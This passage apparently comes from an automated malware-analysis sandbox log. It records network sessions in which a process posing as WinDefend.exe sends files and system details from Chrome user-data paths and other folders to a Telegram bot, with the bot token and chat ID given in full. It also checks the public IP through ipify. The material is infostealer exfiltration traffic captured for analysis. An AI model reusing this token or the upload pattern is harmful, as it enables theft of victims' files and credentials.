68 72 6f Data Ascii: chat_id=1655240967&text=File%3A+128.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChro
2024-05-23 13:34:01 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:01 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	61008	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:02 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="680d53c9-ebba-41ad-9250-1beb359e0683" Host: api.telegram.org Content-Length: 5300 Expect: 100-continue
2024-05-23 13:34:03 UTC	40	OUT	Data Raw: 2d 2d 36 38 30 64 35 33 63 39 2d 65 62 62 61 2d 34 31 61 64 2d 39 32 35 30 2d 31 62 65 62 33 35 39 65 30 36 38 33 0d 0a Data Ascii: --680d53c9-ebba-41ad-9250-1beb359e0683
2024-05-23 13:34:03 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 32 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 32 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=128.png; filename*=utf-8''128.png
2024-05-23 13:34:03 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 13 3d 49 44 41 54 78 9c ed 5d 7d ac 1c d7 55 ff 9d 3b b3 fb de be 4f e7 51 a7 09 51 48 a1 49 28 a4 d0 84 8a c6 76 00 d5 45 a5 96 10 ca 47 55 62 2a 9a c4 52 5b da 34 40 25 90 f8 68 4b 0c a2 42 fc 8b 28 0d 42 ad ed 22 ec 20 9a da 05 95 26 29 55 23 12 25 08 ab c4 6a 5a 91 c4 ae b1 4a 43 9c 38 ce fb f4 db af 99 7b f8 63 66 76 67 66 ef 9d b9 33 3b b3 1f ce fc a4 7d 6f 77 ee bd e7 de 99 f3 bb e7 9c 7b ee cc 2e 50 a1 42 85 0a 15 2a 54 a8 50 a1 42 85 0a 15 2a 54 78 a3 80 c6 3d 80 51 81 99 77 76 bf 77 ff ed ee eb cf 7c 92 65 f3 a6 31 8e 24 18 50 ef 3f 03 e8 6c 5f 5c df 6e ec 7d cf ce eb 7e fe 67 eb d7 ff d1 e1 51 8d e6 0d 41 00 66 be ae f5 f4 6d 87 e4 a5 17 f7 Data Ascii: PNGIHDR>a=IDATx]}U;OQQHI(vEGUbR[4@%hKB(B" &)U#%jZJC8{cfvgf3;}ow{.PBTPB*Tx=Qwvw\|e1$P?l_\n}~gQAfm
2024-05-23 13:34:03 UTC	886	OUT	Data Raw: 7c 72 79 56 27 2c 84 a7 fc 6b f6 e3 80 51 fd 4c d2 0d a0 0f 04 43 75 98 7b af 51 a2 8c 80 2f b1 bf a1 65 67 16 f0 c4 4c 0d 7b 4d 95 0f 94 1a 04 7a b8 fb 21 61 24 48 4f 96 8c 6d 4c 83 42 43 d9 3f fe c8 c7 15 65 c5 99 fc 9f fe 30 eb 1e 4a 1a 09 ca 7b 30 c4 f0 22 24 55 cb 94 2b d0 14 14 46 2c a4 2b 3e 4d ee 24 62 2c b7 84 a5 35 29 42 f1 49 f5 27 45 f9 a3 bb 85 5c 8f 52 33 81 59 44 a4 2e c1 32 16 14 a5 fc cb 55 f1 01 4a 71 01 e1 d3 fb c7 8f 15 7b 3f c0 07 82 fd fd ac 56 02 39 13 52 29 98 66 e5 03 d3 b8 1d 9c 53 89 45 2b 3f 8f af 9f 34 e5 03 23 58 05 8c 0a 79 4c 7e 52 3b 5d 61 de 20 4f a9 fc 09 f8 51 c6 72 5c c0 08 59 53 da ac 2f 48 f9 89 e9 e1 9c 3f 72 5d 24 72 11 20 cb 85 88 df 93 d7 93 61 d4 51 ae 22 af bc 40 e5 17 3a eb c3 70 24 76 1c ba 6f c7 da 81 c3 89 Data Ascii: \|ryV',kQLCu{Q/egL{Mz!a$HOmLBC?e0J{0"$U+F,+>M$b,5)BI'E\R3YD.2UJq{?V9R)fSE+?4#XyL~R;]a OQr\YS/H?r]$r aQ"@:p$vo
2024-05-23 13:34:03 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 38 30 64 35 33 63 39 2d 65 62 62 61 2d 34 31 61 64 2d 39 32 35 30 2d 31 62 65 62 33 35 39 65 30 36 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --680d53c9-ebba-41ad-9250-1beb359e0683Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:03 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:03 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 38 30 64 35 33 63 39 2d 65 62 62 61 2d 34 31 61 64 2d 39 32 35 30 2d 31 62 65 62 33 35 39 65 30 36 38 33 2d 2d 0d 0a Data Ascii: --680d53c9-ebba-41ad-9250-1beb359e0683--
2024-05-23 13:34:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:03 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:03 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	61013	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:05 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 364 Expect: 100-continue
2024-05-23 13:34:05 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:05 UTC	364	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 69 63 6f 6e 5f 31 32 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 Data Ascii: chat_id=1655240967&text=File%3A+icon_128.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data
2024-05-23 13:34:05 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:05 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	61014	64.185.227.155	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:06 UTC	65	OUT	GET / HTTP/1.1 Host: api64.ipify.org Connection: Keep-Alive
2024-05-23 13:34:06 UTC	157	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Thu, 23 May 2024 13:34:06 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin
2024-05-23 13:34:06 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	61015	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:06 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="fec75c00-251d-4cb8-9c45-79b3df3c6196" Host: api.telegram.org Content-Length: 4692 Expect: 100-continue
2024-05-23 13:34:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:07 UTC	40	OUT	Data Raw: 2d 2d 66 65 63 37 35 63 30 30 2d 32 35 31 64 2d 34 63 62 38 2d 39 63 34 35 2d 37 39 62 33 64 66 33 63 36 31 39 36 0d 0a Data Ascii: --fec75c00-251d-4cb8-9c45-79b3df3c6196
2024-05-23 13:34:07 UTC	103	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 63 6f 6e 5f 31 32 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 69 63 6f 6e 5f 31 32 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=icon_128.png; filename*=utf-8''icon_128.png
2024-05-23 13:34:07 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 10 d3 49 44 41 54 78 9c ed 9d 79 70 1c d5 9d c7 bf af bb 67 46 23 c9 3a 2c 5b 48 b2 6c 97 6c 09 c7 38 0e 0b 81 60 2f 0b 6b 12 d8 84 0d de 2c 21 61 37 4b 6d 85 ad ec 45 2e a7 b2 54 65 97 ad 54 1c fe d8 1c 95 4a 02 a4 b6 70 a8 85 90 84 25 18 28 9b 18 04 eb 83 2b 18 9f e0 33 b6 b0 05 b6 65 59 a7 65 a4 99 d1 4c df 6f ff 18 8d 35 d3 d3 f7 f4 68 34 9a f7 a1 5c 85 fa bd f7 7b 3f f5 f7 f7 8e 7e ef 75 0b 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 cc 59 88 d9 c5 c1 c1 c1 5b 28 a5 b7 00 80 ae eb a6 05 29 a5 34 80 fa 83 b0 61 69 c7 ca 77 33 38 8e 2b d8 06 00 10 42 66 8d 2f c8 ba 2f 94 d2 5d 1d 1d 1d 7b 8d 19 04 8b 82 eb 38 8e fb ee 94 33 e6 Data Ascii: PNGIHDR>aIDATxypgF#:,[Hll8`/k,!a7KmE.TeTJp%(+3eYeLo5h4\{?~u`0`0`0`Y[()4aiw38+Bf//]{83
2024-05-23 13:34:07 UTC	268	OUT	Data Raw: ba 8e 44 22 31 24 cb f2 ed 1d 1d 1d 43 56 e5 6c a7 8e cb 96 2d db 2f 49 d2 b5 e3 e3 e3 5b 63 b1 18 55 55 15 94 52 2c aa 6e b2 2b 96 45 a1 0b c4 69 36 36 0c a7 ff d0 63 16 37 5d 49 5d ef b7 65 7b e2 a9 80 1b 08 70 53 97 61 fc a7 12 78 e9 b4 b7 da 0b 9c 4b e9 42 33 28 a5 50 14 05 b1 58 4c 1f 1f 1f df ac 69 da 35 1d 1d 1d 87 ed ca 39 be 17 d0 d5 d5 d5 0f e0 ce 9e 9e 9e b6 58 2c b6 86 e7 f9 25 9c 28 35 2e 47 c3 9d 56 3e cf 1f 1e 2a e4 5c 54 1e c3 04 e8 db f6 6c 2a da be ec f2 ea 8a b0 a0 79 ec 2f 57 2e a8 fe 60 98 b7 dd 4b f6 bc 62 e1 51 88 ce 56 9a 0c 49 a3 a9 c9 f8 c8 74 ab 50 ce 4d 8a 89 a6 cc 2c b0 38 b3 64 03 23 43 ca b3 94 1f 98 d0 75 fd 2c c7 71 fb ad c6 7c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 46 05 f1 ff c4 74 87 07 da 34 62 Data Ascii: D"1$CVl-/I[cUUR,n+Ei66c7]I]e{pSaxKB3(PXLi59X,%(5.GV>\Tly/W.`KbQVItPM,8d#Cu,q\|`0`0`0Ft4b
2024-05-23 13:34:07 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 66 65 63 37 35 63 30 30 2d 32 35 31 64 2d 34 63 62 38 2d 39 63 34 35 2d 37 39 62 33 64 66 33 63 36 31 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --fec75c00-251d-4cb8-9c45-79b3df3c6196Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:07 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:07 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 66 65 63 37 35 63 30 30 2d 32 35 31 64 2d 34 63 62 38 2d 39 63 34 35 2d 37 39 62 33 64 66 33 63 36 31 39 36 2d 2d 0d 0a Data Ascii: --fec75c00-251d-4cb8-9c45-79b3df3c6196--
2024-05-23 13:34:07 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:07 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	61016	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:06 UTC	220	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 493 Expect: 100-continue Connection: Keep-Alive
2024-05-23 13:34:07 UTC	493	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 25 30 44 25 30 41 25 46 30 25 39 46 25 39 36 25 41 35 25 32 30 25 32 41 25 32 41 53 79 73 74 65 6d 25 32 30 49 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 41 25 32 41 25 32 41 25 30 44 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 35 42 25 46 30 25 39 46 25 39 32 25 42 42 25 32 30 4f 53 25 35 44 25 33 41 25 32 30 25 32 30 25 32 30 4d 69 63 72 6f 73 6f 66 74 25 32 30 57 69 6e 64 6f 77 73 25 32 30 4e 54 25 32 30 36 2e 32 2e 39 32 30 30 2e 30 25 30 44 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 35 42 25 46 30 25 39 46 25 39 31 25 41 38 25 45 32 25 38 30 25 38 44 25 46 30 25 39 46 25 39 32 25 42 42 25 32 30 4d 61 63 68 69 6e 65 25 32 30 4e 61 6d 65 25 35 Data Ascii: chat_id=1655240967&text=%0D%0A%F0%9F%96%A5%20%2A%2ASystem%20Information%3A%2A%2A%0D%0A%20%20%20%20%20%20%5B%F0%9F%92%BB%20OS%5D%3A%20%20%20Microsoft%20Windows%20NT%206.2.9200.0%0D%0A%20%20%20%20%20%20%5B%F0%9F%91%A8%E2%80%8D%F0%9F%92%BB%20Machine%20Name%5
2024-05-23 13:34:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:07 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:07 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	61017	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:08 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 363 Expect: 100-continue
2024-05-23 13:34:08 UTC	363	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 69 63 6f 6e 5f 31 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 Data Ascii: chat_id=1655240967&text=File%3A+icon_16.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%
2024-05-23 13:34:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:08 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:08 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	61018	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:08 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 204 Expect: 100-continue
2024-05-23 13:34:08 UTC	204	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 34 39 34 38 37 30 43 2d 39 39 31 32 2d 43 31 38 34 2d 34 43 43 39 2d 42 34 30 31 2d 41 35 33 46 34 44 38 44 45 32 39 30 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 31 34 39 34 38 37 30 43 2d 39 39 31 32 2d 43 31 38 34 2d 34 43 43 39 2d 42 34 30 31 2d 41 35 33 46 34 44 38 44 45 32 39 30 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 31 38 32 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5C1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf%0ASize%3A+182+KB
2024-05-23 13:34:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:08 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:08 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	61019	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:09 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="15d75943-c97b-479a-8ffa-c4a3776220dc" Host: api.telegram.org Content-Length: 884 Expect: 100-continue
2024-05-23 13:34:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:10 UTC	40	OUT	Data Raw: 2d 2d 31 35 64 37 35 39 34 33 2d 63 39 37 62 2d 34 37 39 61 2d 38 66 66 61 2d 63 34 61 33 37 37 36 32 32 30 64 63 0d 0a Data Ascii: --15d75943-c97b-479a-8ffa-c4a3776220dc
2024-05-23 13:34:10 UTC	101	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 63 6f 6e 5f 31 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 69 63 6f 6e 5f 31 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=icon_16.png; filename*=utf-8''icon_16.png
2024-05-23 13:34:10 UTC	558	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 01 f5 49 44 41 54 38 8d a5 93 4d 6b 13 51 18 85 9f 3b 93 98 b4 20 05 ad a6 19 a4 46 84 16 51 57 06 09 14 ba e8 46 17 fe 00 85 4a ed 3f 10 77 2e 14 37 7e e0 ca 82 a0 1b 11 f4 27 04 51 10 d4 85 42 5d c4 85 0b b1 20 88 51 53 d3 99 b6 89 4d 26 5f 77 ee eb 62 26 86 7c 60 17 1e 18 98 fb ce 70 de e7 1c 66 e0 3f a5 44 24 e1 79 5e 06 10 00 11 91 e8 d9 e0 99 c1 79 2a 95 fa ae 5c d7 9d d5 5a 7f 1e 74 36 c6 f4 6f 52 6a 14 40 26 d6 75 1c d0 47 c7 71 4e 29 a5 74 b4 2d 56 2a 95 3e 28 a5 4e 0e 45 70 5d 77 46 6b bd 36 30 6f da b6 5d 30 c6 60 59 96 18 63 54 10 04 59 a5 54 62 88 60 44 46 80 64 10 04 73 00 5a eb 7f 45 c0 1a 39 8d 34 da bb 5f 43 1d 88 5f a7 f1 fa 25 ed c2 Data Ascii: PNGIHDRaIDAT8MkQ; FQWFJ?w.7~'QB] QSM&_wb&\|`pf?D$y^y\Zt6oRj@&uGqN)t-V>(NEp]wFk60o]0`YcTYTb`DFdsZE94_C_%
2024-05-23 13:34:10 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 31 35 64 37 35 39 34 33 2d 63 39 37 62 2d 34 37 39 61 2d 38 66 66 61 2d 63 34 61 33 37 37 36 32 32 30 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --15d75943-c97b-479a-8ffa-c4a3776220dcContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:10 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:10 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 31 35 64 37 35 39 34 33 2d 63 39 37 62 2d 34 37 39 61 2d 38 66 66 61 2d 63 34 61 33 37 37 36 32 32 30 64 63 2d 2d 0d 0a Data Ascii: --15d75943-c97b-479a-8ffa-c4a3776220dc--
2024-05-23 13:34:11 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:11 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	61020	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:09 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="f55f720b-4135-40c0-87de-817a9f7de06d" Host: api.telegram.org Content-Length: 187231 Expect: 100-continue
2024-05-23 13:34:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:10 UTC	40	OUT	Data Raw: 2d 2d 66 35 35 66 37 32 30 62 2d 34 31 33 35 2d 34 30 63 30 2d 38 37 64 65 2d 38 31 37 61 39 66 37 64 65 30 36 64 0d 0a Data Ascii: --f55f720b-4135-40c0-87de-817a9f7de06d
2024-05-23 13:34:10 UTC	169	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 34 39 34 38 37 30 43 2d 39 39 31 32 2d 43 31 38 34 2d 34 43 43 39 2d 42 34 30 31 2d 41 35 33 46 34 44 38 44 45 32 39 30 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 34 39 34 38 37 30 43 2d 39 39 31 32 2d 43 31 38 34 2d 34 43 43 39 2d 42 34 30 31 2d 41 35 33 46 34 44 38 44 45 32 39 30 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf; filename*=utf-8''1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf
